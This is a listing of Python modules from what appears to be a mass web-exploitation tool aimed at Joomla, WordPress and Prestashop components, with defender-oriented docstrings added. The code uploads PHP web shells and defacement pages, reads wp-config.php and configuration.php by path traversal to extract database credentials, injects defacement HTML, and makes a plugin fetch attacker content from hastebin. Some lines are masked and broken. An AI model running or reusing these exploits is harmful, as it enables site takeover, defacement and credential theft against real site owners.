                    site +
                    '/administrator/components/com_civicrm/civicrm/packages/'
                    'OpenFlashChart/tmp-upload-images/vuln.php?cmd=uname -a' +
                    '\n')
                getSMTP.JooomlaSMTPshell(
                    site +
                    '/administrator/components/com_civicrm/civicrm/packages/'
                    'OpenFlashChart/tmp-upload-images/vuln.php?cmd=id')
            return printModule.returnYes(site, 'N/A', 'Com_civicrm', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_civicrm', 'Joomla')
예제 #16
def Com_Jdownloads(site):
    """Upload-and-verify module labelled 'Com_Jdownloads' (Joomla).

    Submits the jDownloads front-end upload form
    (/index.php?option=com_jdownloads&Itemid=0&view=upload) with an archive
    in 'file_upload' and a GIF in 'pic_upload'. If the response references
    '/upload_ok.png', the GIF is fetched from
    /images/jdownloads/screenshots/ and checked for the header 'GIF89a'.

    Defender notes: indicators are anonymous POSTs to the com_jdownloads
    upload view and unexpected files in /images/jdownloads/screenshots/.
    Disabling front-end uploads for unauthenticated users, or updating the
    component, addresses this path.

    ZipJd, Jce_Deface_image, Headers and printModule are defined outside
    this listing.
    """
    try:
        fileindex = {'file_upload': (ZipJd, open(ZipJd, 'rb'), 'multipart/form-data'),
                     'pic_upload': (Jce_Deface_image, open(Jce_Deface_image, 'rb'), 'multipart/form-data')}
        # 'description' appears twice in this literal; Python keeps the
        # later value.
        post_data = {
            'name': 'ur name',
            'mail': '*****@*****.**',
            'catlist': '1',
            'filetitle': "lolz",
            'description': "<p>zot</p>",
            '2d1a8f3bd0b5cf542e9312d74fc9766f': 1,
            'send': 1,
            'senden': "Send file",
            'description': "<p>qsdqsdqsdqsdqsdqsdqsd</p>",
            'option': "com_jdownloads",
            'view': "upload"
        }
        Exp = 'http://' + site + '/index.php?option=com_jdownloads&Itemid=0&view=upload'
        Got = requests.post(Exp, files=fileindex, data=post_data, timeout=10, headers=Headers)
        if '/upload_ok.png' in str(Got.content):
            checkUrl = 'http://' + site + '/images/jdownloads/screenshots/' + Jce_Deface_image.split('/')[1]
            Check = requests.get(checkUrl, timeout=10, headers=Headers)
            if 'GIF89a' in str(Check.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(checkUrl + '\n')
                return printModule.returnYes(site, 'N/A', 'Com_Jdownloads', 'Joomla')
            else:
                return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_Jdownloads', 'Joomla')
예제 #17
def Exploit(site):
    """Upload-and-verify module labelled 'Com_oziogallery' (Joomla).

    POSTs to
    /components/com_oziogallery/imagin/scripts_ralcr/filesystem/writeToFile.php
    with form field path='../../../tmp/' and a multipart part 'raw_data'
    named vuln.php. It then requests /tmp/up.php for the marker 'Vuln!!' and
    logs /tmp/vuln.php on a hit.

    Defender notes: indicators are POSTs to writeToFile.php with a `path`
    value containing '../', and .php files in Joomla's /tmp directory.
    Removing or updating the component, and denying web access to and
    script execution in /tmp, address this path.

    payloadshell, Headers, getSMTP and printModule are defined outside this
    listing; what getSMTP.JooomlaSMTPshell does is not visible here.
    """
    try:
        # Caller-supplied destination directory with parent-directory segments.
        PostData = {'path': '../../../tmp/'}
        fil = {'raw_data': ('vuln.php', payloadshell, 'text/html')}
        requests.post(
            'http://' + site +
            '/components/com_oziogallery/imagin/scripts_ralcr/filesystem'
            '/writeToFile.php',
            files=fil,
            data=PostData,
            headers=Headers,
            timeout=10)
        CheckShell = requests.get('http://' + site + '/tmp/up.php',
                                  headers=Headers,
                                  timeout=10)
        if 'Vuln!!' in str(CheckShell.content):
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(site + '/tmp/vuln.php?cmd=uname -a' + '\n')
            getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php?cmd=id')
            return printModule.returnYes(site, 'N/A', 'Com_oziogallery',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_oziogallery',
                                        'Joomla')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'Com_oziogallery', 'Joomla')
예제 #18
def Exploit(site):
    """Module labelled 'Revslider CSS Injection' and tagged CVE-2015-5151 (WordPress).

    POSTs to admin-ajax.php with action=revslider_ajax_action and
    client_action=update_captions_css, supplying HTML in the `data` field.
    If the response contains 'succesfully', the get_captions_css URL is
    fetched and recorded when it contains 'Vuln!!'.

    Defender notes: indicators are unauthenticated POSTs to admin-ajax.php
    with action=revslider_ajax_action and client_action=update_captions_css,
    and HTML markup in the slider's stored captions CSS. Updating the plugin
    to a release that fixes CVE-2015-5151 and restoring the captions
    stylesheet from a known-good copy address this.

    Headers and printModule are defined outside this listing.
    """
    IndeXText = 'Acik bulundu!'
    # Form body: the `data` value is HTML, not CSS, embedding IndeXText.
    ency = {
        'action':
        "revslider_ajax_action",
        'client_action':
        "update_captions_css",
        'data':
        "<body style='color: transparent;background-color: black'><center><h1>"
        "<b style='color: white'>" + IndeXText +
        "<p style='color: transparent'>",
    }
    try:
        url = "http://" + site + \
              "/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css"
        aa = requests.post(url, data=ency, timeout=10, headers=Headers)
        if 'succesfully' in str(aa.content):
            deface = site + '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css'
            X = requests.get('http://' + deface, timeout=10, headers=Headers)
            if 'Vuln!!' in str(X.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(deface + '\n')
            return printModule.returnYes(site, 'CVE-2015-5151',
                                         'Revslider CSS Injection',
                                         'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2015-5151',
                                        'Revslider CSS Injection', 'Wordpress')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'CVE-2015-5151',
                                    'Revslider CSS Injection', 'Wordpress')
def Exploit(site):
    """Upload-and-verify module labelled 'wg24themeadministration Module' (Prestashop).

    Probes /modules/wg24themeadministration/wg24_ajax.php for HTTP 200, then
    POSTs files as multipart field 'bajatax' with form fields data='bajatax'
    and type='pattern_upload', and fetches them back from
    /modules/wg24themeadministration/img/upload/ under their original base
    names.

    Defender notes: indicators are unauthenticated POSTs to wg24_ajax.php
    with type=pattern_upload and non-image files in img/upload/. Removing or
    updating the module and denying script execution in img/upload/ address
    this path.

    Jce_Deface_image, ShellPresta, Headers and printModule are defined
    outside this listing.
    """
    Exl = site + '/modules/wg24themeadministration/wg24_ajax.php'
    try:
        Checkvuln = requests.get('http://' + Exl, timeout=5, headers=Headers)
        if Checkvuln.status_code == 200:
            # `data` names the multipart field the endpoint should read.
            PostData = {'data': 'bajatax',
                        'type': 'pattern_upload'}
            FileDataIndex = {'bajatax': open(Jce_Deface_image, 'rb')}
            FileDataShell = {'bajatax': open(ShellPresta, 'rb')}
            uploadedPathIndex = site + '/modules/wg24themeadministration/img/upload/' \
                                + Jce_Deface_image.split('/')[1]
            uploadedPathShell = site + '/modules/wg24themeadministration/img/upload/' \
                                + ShellPresta.split('/')[1]
            requests.post('http://' + Exl, files=FileDataIndex, data=PostData, timeout=5, headers=Headers)
            CheckIndex = requests.get('http://' + uploadedPathIndex, timeout=5, headers=Headers)
            if 'GIF89a' in CheckIndex.content:
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(uploadedPathIndex + '\n')
                requests.post('http://' + Exl, files=FileDataShell, data=PostData,
                              timeout=5, headers=Headers)
                Checkshell = requests.get('http://' + uploadedPathShell, timeout=5, headers=Headers)
                if 'Vuln!!' in Checkshell.content:
                    with open('result/Shell_results.txt', 'a') as writer:
                        writer.write(uploadedPathShell + '\n')
                return printModule.returnYes(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
    except:
        # Any exception is reported as "not vulnerable".
        return printModule.returnNo(site, 'N/A', 'wg24themeadministration Module', 'Prestashop')
예제 #20
def Exploit(site):
    """Test the upload script of the Prestashop cartabandonmentproOld module.

    Requests ``/modules/cartabandonmentproOld/upload.php`` on ``site``; on
    HTTP 200 it posts a local image as multipart field ``image`` and then
    fetches it from ``/modules/cartabandonmentproOld/uploads/``. A confirmed
    upload is appended to ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the script is reached without any credentials visible
    here and stores files in a web-served directory. Unsolicited multipart
    POSTs to ``upload.php`` and unknown files in the module's ``uploads/``
    directory are the traces to look for. Removing the legacy module directory
    closes the path.
    """
    try:
        Exp = site + '/modules/cartabandonmentproOld/upload.php'
        Checkvuln = requests.get('http://' + Exp, timeout=5, headers=Headers)
        # The local file is opened before the status check, so a missing file
        # raises here and the site is reported as "no".
        FileDataIndex = {'image': open(Jce_Deface_image, 'rb')}
        if Checkvuln.status_code == 200:
            requests.post('http://' + Exp,
                          files=FileDataIndex,
                          timeout=5,
                          headers=Headers)
            # split('/')[1] assumes the local path looks like 'dir/name' - TODO confirm.
            IndexPath = site + '/modules/cartabandonmentproOld/uploads/' + Jce_Deface_image.split(
                '/')[1]
            CheckIndex = requests.get('http://' + IndexPath,
                                      timeout=5,
                                      headers=Headers)
            # The GIF89a signature in the fetched body is the proof of a stored upload.
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                return printModule.returnYes(site, 'N/A',
                                             'CartabandonmentproOld Module',
                                             'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A',
                                            'CartabandonmentproOld Module',
                                            'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A',
                                        'CartabandonmentproOld Module',
                                        'Prestashop')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A',
                                    'CartabandonmentproOld Module',
                                    'Prestashop')
def Exploit(site):
    """Test the upload form of the Joomla com_alberghi component.

    Requests ``/administrator/components/com_alberghi/upload.alberghi.php`` on
    ``site``. If the page contains the ``userfile`` input, a local image is
    posted as multipart field ``userfile``, after which the function requests
    the stored file path and looks for the GIF89a signature. Confirmed uploads
    are appended to ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: an upload form under ``/administrator/`` is reached here
    with no credentials visible in the function. Direct requests to
    ``upload.alberghi.php`` and unexpected files in the component directory are
    the traces. The relevant mitigations are removing the component or
    restricting the administrator path.
    """
    try:
        fileDeface = {'userfile': open(Jce_Deface_image, 'rb')}
        Exp = 'http://' + site + '/administrator/components/com_alberghi/upload.alberghi.php'
        Check = requests.get(Exp, timeout=10, headers=Headers)
        # Form fingerprint: the upload page is identified by its file input markup.
        if 'class="inputbox" name="userfile"' in str(Check.content):
            Post = requests.post(Exp,
                                 files=fileDeface,
                                 timeout=10,
                                 headers=Headers)
            # NOTE(review): the left operand of `or` is a non-empty string literal,
            # so this condition is always true and the `else` below is never taken.
            # A "yes" from this module therefore does not confirm a stored file.
            if 'has been successfully' or 'already exists' in str(
                    Post.content):
                CheckIndex = requests.get(
                    site + '/administrator/components/com_alberghi/' +
                    Jce_Deface_image.split('/')[1],
                    timeout=10,
                    headers=Headers)
                if 'GIF89a' in str(CheckIndex.content):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(
                            site + '/administrator/components/com_alberghi/' +
                            Jce_Deface_image.split('/')[1] + '\n')
                    return printModule.returnYes(site, 'N/A', 'Com_alberghi',
                                                 'Joomla')
                # Also reported as a hit when the file could not be fetched back.
                return printModule.returnYes(site, 'N/A', 'Com_alberghi',
                                             'Joomla')
            else:
                return printModule.returnNo(site, 'N/A', 'Com_alberghi',
                                            'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'Com_alberghi', 'Joomla')
def Exploit(site):
    """Test the attachment download script of the WordPress wp-support-plus plugin.

    Requests ``downloadAttachment.php`` under
    ``/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/``
    with a ``path`` parameter made of ``../`` segments ending in
    ``wp-config.php``. If the response contains ``DB_PASSWORD``, the URL and
    the parsed database settings are appended to ``result/Config_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: this is a path traversal read of the site configuration
    with no credentials visible in the function. A logged request to
    ``downloadAttachment.php`` whose ``path`` contains ``../`` and that was
    answered with the file means the database credentials and keys in
    ``wp-config.php`` should be treated as disclosed and rotated. The plugin
    itself should be updated or removed.
    """
    try:
        Exp = 'http://' + site + \
              '/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/' \
              'downloadAttachment.php?path=../../../../../wp-config.php'
        GetConfig = requests.get(Exp, timeout=5, headers=Headers)
        # Presence of the DB_PASSWORD constant name is the proof the file was returned.
        if 'DB_PASSWORD' in GetConfig.content:
            with open('result/Config_results.txt', 'a') as ww:
                ww.write('Full Config Path  : ' + Exp + '\n')
            try:
                # Greedy patterns over the define() lines of the returned file.
                Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.content)
                Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.content)
                Getpass = re.findall("'DB_PASSWORD', '(.*)'",
                                     GetConfig.content)
                Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.content)
                with open('result/Config_results.txt', 'a') as ww:
                    # NOTE(review): the statement below appears to have been masked
                    # ('******') by the page it was copied from and is not valid
                    # Python as shown; the original expression is not recoverable here.
                    ww.write(' Host:  ' + Gethost[0] + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + Getdb[0] +
                             '\n---------------------\n')
            except:
                # Parsing failures still count as a hit: the file was disclosed.
                return printModule.returnYes(site, 'N/A', 'wp-support-plus',
                                             'Wordpress')
            return printModule.returnYes(site, 'N/A', 'wp-support-plus',
                                         'Wordpress')
        else:
            return printModule.returnNo(site, 'N/A', 'wp-support-plus',
                                        'Wordpress')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'wp-support-plus',
                                    'Wordpress')
예제 #23
def Exploit(site):
    """Test the bundled upload handler of the Joomla com_jbcatalog component.

    Requests ``/components/com_jbcatalog/libraries/jsupload/server/php`` on
    ``site``; on HTTP 200 it posts a local script as multipart field
    ``files[]`` and requests ``.../server/php/files/up.php``. If the expected
    marker is absent it posts a local image instead and looks for it under the
    same ``files/`` directory. Hits are appended to
    ``result/Shell_results.txt`` or ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the handler accepts uploads with no credentials visible
    in this function and serves them from a directory below the web root.
    Multipart POSTs to ``.../jsupload/server/php`` and script files under
    ``.../server/php/files/`` are the traces. The relevant mitigations are
    removing the sample upload server from the component and disabling script
    execution in that directory.
    """
    try:
        # Presence check only: any 200 response is taken to mean the handler exists.
        Check = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
                             timeout=10, headers=Headers)
        if Check.status_code == 200:
            ShellFile = {'files[]': open(ShellPresta, 'rb')}
            requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
                          files=ShellFile, headers=Headers, timeout=10)
            # The stored name is hard-coded as up.php here rather than derived from
            # ShellPresta - presumably the two match; verify against the caller.
            CheckShell = requests.get('http://' + site +
                                      '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php',
                                      timeout=10, headers=Headers)

            # 'Vuln!!' is the marker expected when the server runs the uploaded script.
            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/up.php\n')
                return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
            else:
                # Fallback: script upload not confirmed, so an image upload is tested.
                ShellFile = {'files[]': open(Jce_Deface_image, 'rb')}
                requests.post('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/php',
                              files=ShellFile, headers=Headers, timeout=10)

                CheckIndex = requests.get('http://' + site + '/components/com_jbcatalog/libraries/jsupload/server/'
                                                             'php/files/' + Jce_Deface_image.split('/')[1],
                                          timeout=10, headers=Headers)
                if 'GIF89a' in str(CheckIndex.content):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/components/com_jbcatalog/libraries/jsupload/server/php/files/'
                                     + Jce_Deface_image.split('/')[1] + '\n')
                    return printModule.returnYes(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
                else:
                    return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'Com_Jbcatalog', 'Joomla')
예제 #24
def Exploit(site):
    """Test the image upload script of the Prestashop advancedslider module.

    Requests ``/modules/advancedslider/ajax_advancedsliderUpload.php`` (with
    the query string built below) on ``site``; on HTTP 200 it posts a local
    image as multipart field ``qqfile`` and then fetches it from
    ``/modules/advancedslider/uploads/``. A confirmed upload is appended to
    ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the upload action is reached with no credentials visible
    in this function. Requests to ``ajax_advancedsliderUpload.php`` carrying
    ``action=submitUploadImage`` and unknown files in the module's ``uploads/``
    directory are the traces. Updating or removing the module closes the path.
    """
    try:
        # The '&' between the two query parameters is written percent-encoded (%26).
        Exp = site + '/modules/advancedslider/ajax_advancedsliderUpload.php?action=submitUploadImage%26id_slide=php'
        Checkvuln = requests.get('http://' + Exp, timeout=10, headers=Headers)
        # Opened before the status check; a missing local file ends in "no".
        FileDataIndex = {'qqfile': open(Jce_Deface_image, 'rb')}
        if Checkvuln.status_code == 200:
            requests.post('http://' + Exp,
                          files=FileDataIndex,
                          timeout=10,
                          headers=Headers)
            # split('/')[1] assumes the local path looks like 'dir/name' - TODO confirm.
            IndexPath = site + '/modules/advancedslider/uploads/' + Jce_Deface_image.split(
                '/')[1]
            CheckIndex = requests.get('http://' + IndexPath,
                                      timeout=10,
                                      headers=Headers)
            # The GIF89a signature in the fetched body is the proof of a stored upload.
            if 'GIF89a' in str(CheckIndex.content):
                with open('result/Index_results.txt', 'a') as writer:
                    writer.write(IndexPath + '\n')
                return printModule.returnYes(site, 'N/A',
                                             'advancedslider Module',
                                             'Prestashop')
            else:
                return printModule.returnNo(site, 'N/A',
                                            'advancedslider Module',
                                            'Prestashop')
        else:
            return printModule.returnNo(site, 'N/A', 'advancedslider Module',
                                        'Prestashop')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'advancedslider Module',
                                    'Prestashop')
예제 #25
def Exploit(site):
    """Test the upload script of the Joomla com_simplephotogallery component.

    Posts to
    ``/administrator/components/com_simplephotogallery/lib/uploadFile.php``
    with a ``jpath`` form value made of encoded ``../`` segments ending in
    ``tmp/`` and a file part named ``vuln.php.xxxjpg``, then requests
    ``/tmp/vuln.php.xxxjpg``. On a marker match the URL is appended to
    ``result/Shell_results.txt`` and two follow-up helpers defined elsewhere
    (``getSMTP.JooomlaSMTPshell`` and ``wsoShellUploaderModule.UploadWso``)
    are called with it.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the destination directory is taken from the request, and
    the double extension suggests a name filter that only checks the final
    suffix (inferred, not shown here). POSTs to ``uploadFile.php`` with a
    ``jpath`` containing ``..`` and files with stacked extensions in the site's
    ``tmp/`` directory are the traces. Mitigations: remove or update the
    component, deny script execution in ``tmp/``, and make sure the web server
    does not treat ``.php.`` in the middle of a name as executable.
    """
    try:
        PostData = {'jpath': '..%2F..%2F..%2F..%2Ftmp%2F'}
        # payloadshell is a module-level value defined outside this block.
        fil = {'file': ('vuln.php.xxxjpg', payloadshell, 'text/html')}
        requests.post(
            'http://' + site +
            '/administrator/components/com_simplephotogallery/lib/uploadFile.php',
            data=PostData,
            files=fil,
            timeout=10,
            headers=Headers)
        # No check of the POST response: success is judged only by fetching the file.
        Exp = requests.get('http://' + site + '/tmp/vuln.php.xxxjpg',
                           timeout=10,
                           headers=Headers)
        if 'Vuln!!' in str(Exp.content):
            with open('result/Shell_results.txt', 'a') as writer:
                writer.write(site + '/tmp/vuln.php.xxxjpg?cmd=uname -a' + '\n')
            # Follow-up helpers; their behaviour is not visible in this block.
            getSMTP.JooomlaSMTPshell(site + '/tmp/vuln.php.xxxjpg?cmd=id')
            WSo = wsoShellUploaderModule.UploadWso(
                site + '/tmp/vuln.php.xxxjpg?cmd=id')
            # 'No' is the helper's failure value; anything else is logged as a result.
            if WSo == 'No':
                pass
            else:
                with open('result/WSo_Shell.txt', 'a') as Wr:
                    Wr.write('{}\n'.format(WSo))
            return printModule.returnYes(site, 'N/A', 'Com_simplephotogallery',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
                                        'Joomla')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'Com_simplephotogallery',
                                    'Joomla')
예제 #26
def Exploit(site):
    """Test the download script of the Joomla com_hdflvplayer component.

    Requests ``/components/com_hdflvplayer/hdflvplayer/download.php`` with an
    ``f`` parameter made of ``../`` segments ending in ``configuration.php``.
    If the response contains ``JConfig``, the URL and the parsed settings are
    appended to ``result/Config_results.txt`` and the body is passed to
    ``getSMTP.GETSmtpJoomConf`` (defined elsewhere).

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: this is a path traversal read of the Joomla
    configuration with no credentials visible in the function. A logged request
    to ``download.php`` whose ``f`` value contains ``../`` and that returned
    the file means the database and mail credentials in ``configuration.php``
    should be treated as disclosed and rotated. The component itself should be
    updated or removed.
    """
    try:
        Exp = 'http://' + site + \
              '/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php'
        GetConfig = requests.get(Exp, timeout=5, headers=Headers)
        # The JConfig class name is the proof that the configuration file was returned.
        if 'JConfig' in str(GetConfig.content):
            with open('result/Config_results.txt', 'a') as ww:
                ww.write('Full Config Path  : ' + Exp + '\n')
            try:
                # NOTE(review): several expressions below appear to have been masked
                # ('******') by the page this was copied from; the write statement is
                # not valid Python as shown and the originals are not recoverable here.
                Gethost = re.findall("host = '(.*)';", str(GetConfig.content))
                Getuser = re.findall("user = '******';", str(GetConfig.content))
                Getpass = re.findall("password = '******';",
                                     str(GetConfig.content))
                Getdb = re.findall("db = '(.*)';", str(GetConfig.content))
                with open('result/Config_results.txt', 'a') as ww:
                    ww.write(' Host:  ' + Gethost[1] + '\n' + ' user:  '******'\n' + ' pass:  '******'\n' + ' DB:    ' + Getdb[0] +
                             '\n---------------------\n')
                getSMTP.GETSmtpJoomConf(str(GetConfig.content))
            except:
                # Parsing failures still count as a hit: the file was disclosed.
                return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
                                             'Joomla')
            return printModule.returnYes(site, 'N/A', 'Com_Hdflvplayer',
                                         'Joomla')
        else:
            return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer',
                                        'Joomla')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'N/A', 'Com_Hdflvplayer', 'Joomla')
def Exploit(site):
    """Test a WordPress site for the Social Warfare issue labelled CVE-2019-9978.

    Sends a GET to ``/wp-admin/admin-post.php`` with
    ``swp_debug=load_options`` and an ``swp_url`` pointing at an external paste
    URL, then requests ``/wp-admin/vuln.php`` and ``/wp-admin/vuln.htm`` and
    looks for a marker string. Hits are appended to
    ``result/Index_results.txt`` and ``result/Shell_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the plugin is made to fetch attacker-hosted content, and
    the checks below imply that content creates files under ``wp-admin/``.
    Requests to ``admin-post.php`` carrying ``swp_debug`` and ``swp_url``,
    outbound fetches from the web server to paste sites, and unexpected files
    in ``wp-admin/`` are the traces. Updating the plugin to a fixed release is
    the mitigation.
    """
    try:
        # Remote content the plugin is asked to load; its body is not visible here.
        Payload = 'https://hastebin.com/raw/etonipusij'
        exp = 'http://{}/wp-admin/admin-post.php?swp_debug=load_options&swp_url={}'.format(
            site, Payload)
        requests.get(exp, timeout=10, headers=Headers)
        CheckShell = requests.get('http://{}/wp-admin/vuln.php'.format(site),
                                  timeout=10,
                                  headers=Headers)
        CheckIndex = requests.get('http://{}/wp-admin/vuln.htm'.format(site),
                                  timeout=10,
                                  headers=Headers)
        # The verdict depends on the .htm marker only; the .php check is nested
        # inside it and affects just which result file gets a line.
        if 'Vuln!!' in str(CheckIndex.content):
            with open('result/Index_results.txt', 'a') as writer:
                writer.write('{}/wp-admin/vuln.htm\n'.format(site))
            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(
                        '{}/wp-admin/vuln.php?cmd=whoami;);\n'.format(site))
            return printModule.returnYes(site, 'CVE-2019-9978',
                                         'Social Warfare', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2019-9978',
                                        'Social Warfare', 'Wordpress')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'CVE-2019-9978', 'Social Warfare',
                                    'Wordpress')
예제 #28
def Exploit(site):
    """Test a WordPress site for the wysija-newsletters issue labelled CVE-2014-4725.

    Posts a local zip archive as multipart field ``my-theme`` to
    ``/wp-admin/admin-post.php?page=wysija_campaigns&action=themes`` with the
    theme-upload form fields below. If the response contains the reload link,
    it requests two files under ``/wp-content/uploads/wysija/themes/rock/`` and
    records hits in ``result/Shell_results.txt`` and
    ``result/Index_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the theme upload action is driven here without any
    session or nonce visible in the request. Unauthenticated POSTs to
    ``admin-post.php`` with ``page=wysija_campaigns`` and script files under
    ``wp-content/uploads/wysija/themes/`` are the traces. Mitigations: update
    the plugin and deny script execution under ``wp-content/uploads/``.
    """
    try:
        FileShell = {'my-theme': open(MailPoetZipShell, 'rb')}
        PostData = {'action': "themeupload", 'submitter': "Upload", 'overwriteexistingtheme': "on",
                    'page': 'GZNeFLoZAb'}
        # The upload uses its own fixed User-Agent; the follow-up GETs use Headers.
        UserAgent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
        url = "http://" + site + "/wp-admin/admin-post.php?page=wysija_campaigns&action=themes"
        GoT = requests.post(url, files=FileShell, data=PostData, headers=UserAgent, timeout=10)
        # The HTML-escaped reload link is taken as the sign that the upload was accepted.
        if 'page=wysija_campaigns&amp;action=themes&amp;reload=1' in str(GoT.content):
            # 'rock' and the two file names presumably come from the archive's
            # contents - verify against MailPoetZipShell.
            sh = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/vuln.php'
            index = 'http://' + site + '/wp-content/uploads/wysija/themes/rock/pwn.gif'
            CheckShell = requests.get(sh, timeout=10, headers=Headers)
            CheckIndex = requests.get(index, timeout=10, headers=Headers)
            # The verdict depends on the script marker; the image check only adds a line.
            if 'Vuln!!' in str(CheckShell.content):
                with open('result/Shell_results.txt', 'a') as writer:
                    writer.write(site + '/wp-content/uploads/wysija/themes/rock/vuln.php' + '\n')
                if 'GIF89a' in str(CheckIndex.content):
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(site + '/wp-content/uploads/wysija/themes/rock/pwn.gif' + '\n')
                return printModule.returnYes(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
            else:
                return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
        else:
            return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
    except:
        # All errors are collapsed into "no"; a negative is not proof of safety.
        return printModule.returnNo(site, 'CVE-2014-4725', 'wysija-newsletters', 'Wordpress')
def Exploit(site):
    """Test the image upload script of the Prestashop columnadverts module.

    Posts ``files/pwn.gif`` as multipart field ``userfile`` to
    ``/modules/columnadverts/uploadimage.php`` on ``site``. If the response
    contains ``success`` and the image can be fetched from
    ``/modules/columnadverts/slides/``, it posts ``files/up.php`` the same way
    and checks for a marker. Hits are appended to
    ``result/Index_results.txt`` and ``result/Shell_results.txt``.

    Returns whatever ``printModule.returnYes`` / ``printModule.returnNo``
    return (both are defined elsewhere).

    Defensive reading: the upload script is reached with no credentials visible
    in this function and keeps the client-supplied file name. Multipart POSTs
    to ``uploadimage.php`` and non-image files in the module's ``slides/``
    directory are the traces. Mitigations: update or remove the module and deny
    script execution in ``slides/``.
    """
    try:
        Exp = site + '/modules/columnadverts/uploadimage.php'
        # Both local files are opened up front; neither handle is closed here.
        FileDataIndex = {'userfile': open('files/pwn.gif', 'rb')}
        FileDataShell = {'userfile': open('files/up.php', 'rb')}
        GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=10, headers=Headers)
        if 'success' in GoT.content:
            IndexPath = '/modules/columnadverts/slides/pwn.gif'
            CheckIndex = requests.get('http://' + site + IndexPath, timeout=10, headers=Headers)
